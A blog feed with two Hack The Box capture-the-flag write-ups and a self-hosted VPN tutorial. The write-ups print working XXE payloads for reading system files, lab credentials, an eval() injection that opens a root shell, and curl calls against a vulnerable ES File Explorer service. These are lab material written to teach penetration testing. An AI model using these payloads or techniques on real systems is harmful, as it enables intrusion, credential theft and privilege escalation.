Jekyll2021-11-25T16:58:32+00:00https://javierolmedo.github.io/feed.xmlJavier Olmedo’s BlogOSWE | Cybersecurity enthusiast and CTF PlayerJavier Olmedocontacto@hackpuntes.comHack The Box - Machine - BountyHunter2021-11-25T00:00:00+00:002021-11-25T00:00:00+00:00https://javierolmedo.github.io/htb-machine-bountyhunter<!-- BANNER -->
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_banner.png">
<img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_banner.png" alt="Hack The Box - Machine - BountyHunter" />
</a></p>
<!-- OVERVIEW -->
<h1 id="overview">Overview</h1>
<p>Welcome to the writeup of the <strong>bountyhunter machine</strong> of the Hack The Box platform. BountyHunter is a Linux based machine that was active since July 24th to November 20th, on this machine we will find a XXE vulnerability and use it with a php wrapper to read internal files and get sensitive information, with the information gotten we will be able to connect to the machine through SSH, once inside the machine we will analyze a python script to find how we can abuse it to get code execution as root user and finish with the machine.</p>
<!-- BEFORE STARTING -->
<h1 id="before-starting">Before starting</h1>
<h2 id="tmux-for-vpn-connection">Tmux for VPN connection</h2>
<p>Connect to <strong>Hack The Box VPN</strong> in background with <code>tmux</code></p>
<pre><code class="language-bash">tmux new -s htb
sudo openvpn ~/.vpn/htb.ovpn
</code></pre>
<h2 id="add-to-hosts-file">Add to hosts file</h2>
<p><strong>Add</strong> machine to <code>/etc/hosts</code> file, <strong>check connection</strong> with <code>ping</code> and <strong>create work folders</strong></p>
<pre><code class="language-bash">echo '10.10.11.100 bountyhunter.htb' >> /etc/hosts
ping -c 1 bountyhunter.htb
mkdir -p ~/htb/bountyhunter.htb/{exploits,fuzz,http,nmap}
</code></pre>
<h1 id="recon">Recon</h1>
<h2 id="scan-with-nmap">Scan with nmap</h2>
<p>Check <strong>all ports</strong> that are <strong>open</strong>, detect the service and its version with <code>nmap</code></p>
<pre><code class="language-bash">nmap -sC -sV -p- -T4 --min-rate=1000 -v -oA all bountyhunter.htb
</code></pre>
<pre><code class="language-nmap">PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Bounty Hunters
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_nmap.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_nmap.png" /></a></p>
<h2 id="check-website">Check website</h2>
<p>Open firefox to inspect website</p>
<pre><code class="language-bash">firefox http://bountyhunter.htb &
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_website.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_website.png" /></a></p>
<h2 id="fuzzing-with-gobuster">Fuzzing with gobuster</h2>
<p>Find directories and PHP files</p>
<pre><code class="language-bash">gobuster dir -u "http://bountyhunter.htb/" -w "/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt" -t 23 -x php -o root_directories_php.fuzz
</code></pre>
<pre><code class="language-txt">/assets (Status: 301) [Size: 321] [--> http://bountyhunter.htb/assets/]
/css (Status: 301) [Size: 318] [--> http://bountyhunter.htb/css/]
/db.php (Status: 200) [Size: 0]
/index.php (Status: 200) [Size: 25169]
/js (Status: 301) [Size: 317] [--> http://bountyhunter.htb/js/]
/portal.php (Status: 200) [Size: 125]
/resources (Status: 301) [Size: 324] [--> http://bountyhunter.htb/resources/]
/server-status (Status: 403) [Size: 281]
</code></pre>
<p>Interesting file <code>db.php</code>, response code is <strong>200</strong> but size is <strong>0</strong>.
Open BurpSuite and navegate to web page, the <strong>portal link</strong> in main page go to <strong>Bounty Report System</strong>.</p>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_001.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_001.png" /></a></p>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_002.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_002.png" /></a></p>
<p>The above fields are converted to <strong>base64</strong> to form an <strong>XML structure</strong>, <strong>time to check XXE vulnerability</strong>.</p>
<h1 id="gain-access">Gain Access</h1>
<p>Use <a href="https://gchq.github.io/CyberChef/">CyberChef</a> tool to generate payload, use To Base64 and URL Encode with special chars.</p>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_003.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_003.png" /></a></p>
<p>XXE Payload</p>
<pre><code class="language-xml"><?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
</code></pre>
<p>Payload</p>
<pre><code class="language-txt">PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgICA8dGl0bGU%2BJnh4ZTs8L3RpdGxlPgogICAgPGN3ZT50ZXN0PC9jd2U%2BCiAgICA8Y3Zzcz50ZXN0PC9jdnNzPgogICAgPHJld2FyZD50ZXN0PC9yZXdhcmQ%2BCjwvYnVncmVwb3J0Pg%3D%3D
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_004.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_004.png" /></a></p>
<p>Do you remember db.php file found in fuzz?</p>
<pre><code class="language-xml"><?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=db.php"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
</code></pre>
<p>Payload to base64</p>
<pre><code class="language-txt">PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI%2FPgo8IURPQ1RZUEUgcmVwbGFjZSBbPCFFTlRJVFkgeHhlIFNZU1RFTSAicGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPWRiLnBocCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgICA8dGl0bGU%2BJnh4ZTs8L3RpdGxlPgogICAgPGN3ZT50ZXN0PC9jd2U%2BCiAgICA8Y3Zzcz50ZXN0PC9jdnNzPgogICAgPHJld2FyZD50ZXN0PC9yZXdhcmQ%2BCjwvYnVncmVwb3J0Pg%3D%3D
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_005.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_005.png" /></a></p>
<pre><code class="language-txt"><?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
</code></pre>
<p>Time to check ssh, I could not log in with admin and password, but if we check the file extracted from the previous step, we can see that there is a user named development.</p>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_006.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_006.png" /></a></p>
<pre><code class="language-bash">ssh development@bountyhunter.htb
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_user.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_user.png" /></a></p>
<h1 id="privilege-escalation">Privilege Escalation</h1>
<pre><code class="language-bash">sudo -l
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_007.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_007.png" /></a></p>
<p>The file <code>/opt/skytrain_inc/ticketValidator.py</code> is executed as <strong>root</strong>, maybe we can escalate here.</p>
<pre><code class="language-python">#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
if loc.endswith(".md"):
return open(loc, 'r')
else:
print("Wrong file type.")
exit()
def evaluate(ticketFile):
#Evaluates a ticket to check for ireggularities.
code_line = None
for i,x in enumerate(ticketFile.readlines()):
if i == 0:
if not x.startswith("# Skytrain Inc"):
return False
continue
if i == 1:
if not x.startswith("## Ticket to "):
return False
print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
continue
if x.startswith("__Ticket Code:__"):
code_line = i+1
continue
if code_line and i == code_line:
if not x.startswith("**"):
return False
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
validationNumber = eval(x.replace("**", ""))
if validationNumber > 100:
return True
else:
return False
return False
def main():
fileName = input("Please enter the path to the ticket file.\n")
ticket = load_file(fileName)
#DEBUG print(ticket)
result = evaluate(ticket)
if (result):
print("Valid ticket.")
else:
print("Invalid ticket.")
ticket.close
main()
</code></pre>
<p>Reviewing the above code, you can <strong>create a markdown file</strong> to achieve the following command execution, <code>exploit.md</code></p>
<pre><code class="language-markdown"># Skytrain Inc
## Ticket to root
**Ticket Code:**
\*\*102 + 10 == 112 and **import**('os').system('/bin/bash') == False
</code></pre>
<pre><code class="language-bash">python -m http.server 80
</code></pre>
<pre><code>cd /tmp
wget http://10.10.15.162/exploit.md
chmod 777 exploit.md
sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
/tmp/exploit.md
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_root.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_root.png" /></a></p>Javier Olmedocontacto@hackpuntes.comWelcome to the writeup of the bountyhunter machine of the Hack The Box platform. BountyHunter is an easy difficulty machine on linux.Hack The Box - Machine - Explore2021-10-30T00:00:00+00:002021-10-30T00:00:00+00:00https://javierolmedo.github.io/htb-machine-explore<!-- BANNER -->
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_banner.png">
<img src="/assets/images/htb-machine-explore/htb-machine-explore_banner.png" alt="Hack The Box - Machine - Explore" />
</a></p>
<p>Welcome to the writeup of the <strong>explore machine</strong> of the Hack The Box platform. Explore is an <strong>easy</strong> difficulty machine on android.</p>
<h1 id="before-starting">Before starting</h1>
<p>Connect to <strong>Hack The Box VPN</strong> in background with <code>TMUX</code></p>
<pre><code class="language-bash">tmux new -s htb
sudo openvpn ~/.vpn/htb.ovpn
</code></pre>
<p><strong>Add</strong> machine to <code>/etc/hosts</code> file, <strong>check connection</strong> with <code>ping</code> and <strong>create work folders</strong></p>
<pre><code class="language-bash">echo '10.10.10.247 explore.htb' >> /etc/hosts
ping -c 4 explore.htb
mkdir -p ~/htb/explorer.htb/{exploits,fuzz,http,nmap}
</code></pre>
<h1 id="recon">Recon</h1>
<p>Check <strong>all open ports</strong>, detect the service and its version with <code>nmap</code></p>
<pre><code class="language-bash">nmap -sC -sV -p- -T4 --min-rate=1000 -v -oA all explore.htb
</code></pre>
<pre><code class="language-nmap">Nmap scan report for explore.htb (10.10.10.247)
Host is up (0.048s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
44347/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:00:48 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sat, 30 Oct 2021 11:00:48 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sat, 30 Oct 2021 11:00:53 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:01:08 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:00:53 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:01:08 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:01:08 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:01:08 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.92%I=7%D=10/30%Time=617D2253%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port44347-TCP:V=7.92%I=7%D=10/30%Time=617D2252%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x2
SF:030\x20Oct\x202021\x2011:00:48\x20GMT\r\nContent-Length:\x2022\r\nConte
SF:nt-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n
SF:\r\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412
SF:\x20Precondition\x20Failed\r\nDate:\x20Sat,\x2030\x20Oct\x202021\x2011:
SF:00:48\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1
SF:\.0\x20501\x20Not\x20Implemented\r\nDate:\x20Sat,\x2030\x20Oct\x202021\
SF:x2011:00:53\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/pl
SF:ain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x
SF:20supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20
SF:Request\r\nDate:\x20Sat,\x2030\x20Oct\x202021\x2011:00:53\x20GMT\r\nCon
SF:tent-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\
SF:r\nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version
SF::\x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nD
SF:ate:\x20Sat,\x2030\x20Oct\x202021\x2011:01:08\x20GMT\r\nContent-Length:
SF:\x2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnectio
SF:n:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionRe
SF:q,DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x2030\x20Oct\
SF:x202021\x2011:01:08\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x2
SF:0text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid
SF:\x20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\
SF:?\0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalS
SF:erverCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x20
SF:30\x20Oct\x202021\x2011:01:08\x20GMT\r\nContent-Length:\x2054\r\nConten
SF:t-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\
SF:r\nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20mst
SF:shash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\n
SF:Date:\x20Sat,\x2030\x20Oct\x202021\x2011:01:08\x20GMT\r\nContent-Length
SF::\x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnecti
SF:on:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\
SF:0e\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");
Service Info: Device: phone
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_nmap.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_nmap.png" /></a></p>
<p>Open firefox to inspect website</p>
<pre><code class="language-bash">firefox http://explore.htb:59777 &
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_001.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_001.png" /></a></p>
<p>Nothing interesting 😥, let’s look for information….</p>
<p>On port <strong>42135</strong> is running <strong>ES File Explorer</strong>, a public vulnerability that I was already testing the PoC of <a href="https://github.com/fs0c131y/ESFileExplorerOpenPortVuln">fs0c131y’s Github</a>, I could see that <a href="https://github.com/alecgorge/jsonapi">JSONAPI</a> is a Bukkit add-on, which allows to consume an API, maybe they can be related.</p>
<p>By reading the README.md from the repository, you can generate a payload to test the vulnerability.</p>
<pre><code class="language-bash">curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://explore.htb:59777
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_002.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_002.png" /></a></p>
<p><a href="/assets/images/others/anthony_adams_rubbing_hands.jpg"><img src="/assets/images/others/anthony_adams_rubbing_hands.jpg" /></a></p>
<p>After searching for interesting files, I found an image with the credentials of the user <code>kriti</code> located in the <code>/storage/emulated/0/DCIM/creds.jpg</code> folder.</p>
<pre><code class="language-bash">curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://explore.htb:59777
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_003.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_003.png" /></a></p>
<p>To get <code>creds.jpg</code> use this command:</p>
<pre><code class="language-txt">python exploit_ESFileExplorer.py --get-file /storage/emulated/0/DCIM/creds.jpg --host explore.htb
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_004.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_004.png" /></a></p>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_005.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_005.png" /></a></p>
<p>Credentials</p>
<pre><code class="language-txt">kristi:Kr1sT!5h@Rp3xPl0r3!
</code></pre>
<h1 id="gain-access">Gain Access</h1>
<p>SSH service is running on port <code>2222</code>, connect with the credentials and show <code>user.txt</code> flag</p>
<pre><code class="language-bash">ssh -p 2222 kristi@explore.htb
cat /sdcard/user.txt
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_user.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_user.png" /></a></p>
<h1 id="privilege-escalation">Privilege Escalation</h1>
<p>Checking the network connections, we observe that port <code>5555</code> is listening, this port is used by default by <code>ADB</code> (Android Debug Bridge).</p>
<pre><code class="language-bash">netstat -nlpt
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_006.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_006.png" /></a></p>
<p>So lets try to port <strong>forward</strong> it through ssh and try to connect it through our box</p>
<pre><code class="language-bash">ssh -p 2222 kristi@explore.htb -L 5555:localhost:5555
</code></pre>
<p>Use <code>adb</code> to get root access, find flag and show.</p>
<pre><code class="language-bash">adb -s localhost:5555 root
</code></pre>
<pre><code class="language-bash">adb -s localhost:5555 shell
</code></pre>
<pre><code class="language-bash">find / -name "root.txt" 2>/dev/null
</code></pre>
<pre><code class="language-bash">cat /data/root.txt
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_root.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_root.png" /></a></p>
<p><a href="/assets/images/others/boom.gif"><img src="/assets/images/others/boom.gif" /></a></p>Javier Olmedocontacto@hackpuntes.comWelcome to the writeup of the explore machine of the Hack The Box platform. Explore is an easy difficulty machine on android.Create your own log-free VPN2020-11-24T00:00:00+00:002020-11-24T00:00:00+00:00https://javierolmedo.github.io/create-your-own-log-free-vpn<!-- BANNER -->
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_banner.png">
<img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_banner.png" alt="Create your own log-free VPN" />
</a></p>
<!-- PREFACE -->
<h1 id="preface">Preface</h1>
<p>Welcome to the tutorial on <strong>how to create our own log-free VPN</strong> by setting up an OpenVPN server on a cloud machine.</p>
<p>Before starting with the tutorial, you must create a machine in the cloud, for this tutorial, we have chosen to use a <strong>DigitalOcean VPS</strong> with an Ubuntu 20.04 machine, which has a cost of $5 per month, through the following <a href="https://m.do.co/c/67dd38080d62">link</a> you can get <strong>$100 for free</strong>.</p>
<!-- CONTENT -->
<h1 id="creating-a-cloud-machine">Creating a cloud machine</h1>
<p>As I mentioned at the beginning, I have chosen DigitalOcean as VPS, but there are others like Linode, Azure or AWS. To create an Ubuntu 20.04 machine we must go to the top right of our panel and select <code>Create -> Droplets</code>.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_001.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_001.png" /></a></p>
<p>We will choose the following image with the cheapest plan (<strong>Ubuntu 20.04 for 5$ per month</strong>, remember you get 100$ free if you use my link). We can also choose the location of our server, in my case I will use Frankfurt (Germany) and create credentials for the root user.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_002.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_002.png" /></a></p>
<h1 id="generate-ssh-keys">Generate SSH keys</h1>
<p>In the previous step, we created a password for the root user, but using unencrypted passwords to log in to our machine is not a good idea since they can be exposed on the network because they are not encrypted. Therefore, we will generate keys so that only machines that have them (and the password) can log in.</p>
<p>We can generate the keys in the following way:</p>
<ul>
<li>Windows (with Powershell):</li>
</ul>
<pre><code class="language-ps1">PS C:\> Add-WindowsCapability -Online -Name OpenSSH.Client*
</code></pre>
<ul>
<li>Linux and Mac:</li>
</ul>
<pre><code class="language-bash">ssh-keygen -t rsa -b 4096
</code></pre>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_003.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_003.png" /></a></p>
<h1 id="login-to-the-server-and-update">Login to the server and update</h1>
<p>We log in to our server, remember that you can see the IP of your machine in the DigitalOcean main panel.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_004.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_004.png" /></a></p>
<pre><code class="language-bash">ssh root@[IP]
</code></pre>
<p>Enter the password you specified when creating the machine and execute the update commands.</p>
<pre><code class="language-bash">apt-get update && apt-get upgrade
</code></pre>
<h1 id="create-a-user">Create a user</h1>
<p>Although the root user allows us to perform any action on the machine, it is not recommended that it be SSH enabled, therefore, we will create a user with permissions to use sudo and bash as the default shell.</p>
<pre><code class="language-bash">useradd -G sudo -m jolmedo -s /bin/bash
</code></pre>
<p>Then we will create a password.</p>
<pre><code class="language-bash">passwd jolmedo
</code></pre>
<h1 id="copy-ssh-keys-to-the-server">Copy SSH keys to the server</h1>
<p>In this step, we are going to copy the SSH keys generated from the previous step to our cloud machine.</p>
<ul>
<li>Windows (with Powershell):</li>
</ul>
<pre><code class="language-ps1">type $env:USERPROFILE\.ssh\id_rsa.pub | ssh IP "cat >> .ssh/authorized_keys"
</code></pre>
<ul>
<li>Linux and Mac:</li>
</ul>
<pre><code class="language-bash">ssh-copy-id jolmedo@[IP]
</code></pre>
<h1 id="disable-password-authentication-and-security-settings-for-ssh">Disable password authentication and security settings for SSH</h1>
<p>Once we have the SSH keys on the server, we will proceed to disable password authentication and enable public key authentication. Edit the sshd file</p>
<pre><code class="language-bash">nano /etc/ssh/sshd_config
</code></pre>
<p>First of all, let’s change the default SSH port, you can use any port (I will use 22022), this will help to prevent scanners from trying to login to our server with default credentials.</p>
<pre><code class="language-bash"># Port 22
Port 22022
</code></pre>
<p>Disable password authentication (you can only log in with public key).</p>
<pre><code class="language-bash">PasswordAuthentication no
</code></pre>
<p>Disable root login.</p>
<pre><code class="language-bash">PermitRootLogin no
</code></pre>
<p>Finally, we restart SSH to apply changes.</p>
<pre><code class="language-bash">systemctl restart sshd
</code></pre>
<h1 id="openvpn-configuration">OpenVPN Configuration</h1>
<p>Here comes the highlight of the tutorial, configuring OpenVPN can take some time (installing packages, generating keys, configuring IPTables, generating configuration files, etc), but thanks to the work of a GitHub user, we can do it in a very simple way.</p>
<p>First, download the repository.</p>
<pre><code class="language-bash">git clone https://github.com/Nyr/openvpn-install.git
</code></pre>
<p>We position ourselves in the directory.</p>
<pre><code class="language-bash">cd openvpn-install/
</code></pre>
<p>Run the script.</p>
<pre><code class="language-bash">sudo bash openvpn-install.sh
</code></pre>
<p>NOTE: Whenever you download any script, make sure there is nothing suspicious in it.</p>
<p>Once executed, we only have to answer a few questions.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_005.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_005.png" /></a></p>
<p>If you have noticed in the previous screenshot, I have changed the OpenVPN default port to 443, this is because some networks may block that port. I have decided to use 443 (the same as HTTPS) and you may wonder that this may cause some problems but, while HTTPS uses TCP, OpenVPN uses UDP, therefore, there will be no conflict between them.</p>
<p>After answering the questions, the installation process will begin. When it finishes, we will be able to see our .ovpn configuration file in the root user’s root folder, let’s move it to the jolmedo user’s folder and assign it as owner.</p>
<pre><code class="language-bash">sudo mv /root/hackpuntes-vps.ovpn ~
</code></pre>
<pre><code class="language-bash">sudo chown jolmedo hackpuntes-vps.ovpn
</code></pre>
<h1 id="disable-logs-in-our-vpn">Disable logs in our VPN</h1>
<p>With everything already prepared, we only have to do a very important thing in the server part, and it is to disable the logs, for it, we are going to modify the following file.</p>
<pre><code class="language-bash">sudo nano /etc/openvpn/server/server.conf
</code></pre>
<p>We look for the verb 3 line and change it to verb 0. Now we restart OpenVPN.</p>
<pre><code class="language-bash">systemctl restart openvpn-server@server.service
</code></pre>
<p>We now have a VPN that does not actually keep logs.</p>
<h1 id="test-the-vpn">Test the VPN</h1>
<p>We download the hackpuntes-vps.ovpn file to our local machine and create a new VPN connection.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_006.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_006.png" /></a></p>
<p>Choose Import a saved VPN configuration…
<a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_007.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_007.png" /></a></p>
<p>Select the file hackpuntes-vps.ovpn
<a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_008.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_008.png" /></a></p>
<p>And we will see something similar to the following:
<a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_009.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_009.png" /></a></p>
<p>Save the changes and we now have our VPN fully functional and without logging.
<a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_010.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_010.png" /></a></p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_011.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_011.png" /></a></p>
